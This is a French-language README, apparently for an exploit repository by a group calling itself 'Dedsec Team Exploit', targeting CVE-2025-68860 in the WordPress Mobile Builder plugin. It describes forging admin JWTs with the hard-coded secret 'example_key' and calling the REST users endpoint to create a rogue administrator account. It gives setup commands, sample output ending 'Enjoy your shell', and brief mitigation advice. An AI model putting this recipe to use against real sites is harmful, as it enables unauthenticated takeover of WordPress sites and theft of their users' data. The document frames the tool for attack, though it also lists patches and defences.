
Script d'exploitation pour CVE-2025-68860 ciblant le plugin WordPress Mobile Builder. Génère des jetons JWT falsifiés en utilisant un secret codé en dur pour s'authentifier en tant qu'admin et créer de nouveaux comptes administrateur via l'API REST.
Le plugin WordPress Mobile builder version 1.4.2 et inférieures présente une vulnérabilité d'authentification cassée qui permet à un attaquant de créer un token JWT valide avec le secret par défaut "example_key" et de s'authentifier en tant qu'admin (user_id=1). Avec ce token, l'attaquant peut créer un nouveau compte administrateur et prendre le contrôle du site.
CVE : CVE-2025-68860
Cause : Utilisation d'une clé secrète codée en dur "example_key" pour JWT, sans validation adéquate.
Emplacement de la vulnérabilité : Dans le plugin Mobile builder, le fichier qui gère l'authentification JWT (par exemple class-jwt-auth.php) utilise la constante JWT_SECRET avec la valeur par défaut 'example_key'. Ce secret ne peut pas être modifié via les paramètres, ce qui permet à un attaquant de créer un token pour n'importe quel user_id.
Impact : Un attaquant peut créer un token pour user_id=1 (admin), accéder aux endpoints de l'API REST et créer un nouvel utilisateur avec le rôle administrateur.
CVSS : High (score 8.8) - vecteur réseau, aucune interaction utilisateur requise.
Le script crée un token JWT avec un payload contenant user_id: 1 (admin) et secret "example_key".
Le token est utilisé pour accéder à /wp-json/wp/v2/users/ afin de vérifier l'accès admin.
En cas de succès, le script envoie une requête POST à /wp-json/wp/v2/users pour créer un nouvel utilisateur avec le nom d'utilisateur dedsec1337, le mot de passe admin, l'email [email protected] et le rôle administrateur.
La sortie affiche les identifiants et la réponse de l'API.
Python 3.6+
Library: requests, PyJWT, colorama
Target WordPress dengan plugin Mobile builder versi <= 1.4.2 yang aktif.
git clone https://github.com/username/CVE-2025-68860
cd CVE-2025-68860
pip install -r requirements.txt
╔═══════════════════════════════════════════════════════════════════╗
║ WordPress Mobile builder <= 1.4.2 Broken Authentication Exploit ║
║ CVE-2025-68860 Priority: HIGH ║
║ Dedsec Team Exploit ║
╚═══════════════════════════════════════════════════════════════════╝
Exploit by : Dedsec Team Exploit
Telegram : @DedsecTeam1337
GitHub : https://github.com/DedsecTeam-BlackHat
[INFO] CVE-2025-68860 // WordPress Mobile builder Broken Authentication
[INFO] All old exploits/settings are ignored, running this vector only.
Site URL (example: http://target.site): http://localhost/wordpress
[INFO] Generating JWT as admin (user_id=1)...
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9...
--------------------------------------------------------------
[INFO] Testing JWT at /wp-json/wp/v2/users/me
[SUCCESS] JWT valid! Confirmed admin access.
--------------------------------------------------------------
[INFO] Creating admin account using exploit...
[INFO] Exploiting, please wait...
[SUCCESS] ✅ Admin user created successfully!
==============[ New Admin Credentials ]==============
Username : dedsec1337
Password : admin
Email : [email protected]
===================================================
Full API response:
{
"id": 3,
"username": "dedsec1337",
"name": "dedsec1337",
"email": "[email protected]",
"roles": ["administrator"]
}
--------------------------------------------------------------
[SUCCESS] Exploit finished. Enjoy your shell.
...
Un attaquant peut créer un nouveau compte administrateur, accéder à toutes les fonctionnalités de WordPress, installer des plugins malveillants, modifier le contenu, voler les données des utilisateurs ou utiliser le site pour d'autres attaques.
Cette vulnérabilité peut être exploitée à distance sans authentification préalable.
Impact : compromission totale du site WordPress.
Mettez immédiatement à jour le plugin Mobile builder vers la dernière version (>=1.4.3).
Si aucune mise à jour n'est disponible, désactivez temporairement le plugin.
Vérifiez s'il y a des utilisateurs suspects sur votre site.
Utilisez un pare-feu d'application web (WAF) pour bloquer les requêtes suspectes vers les endpoints de l'API REST.
À titre de mesure temporaire, modifiez la clé secrète dans le code du plugin (si possible) et limitez l'accès à l'API REST.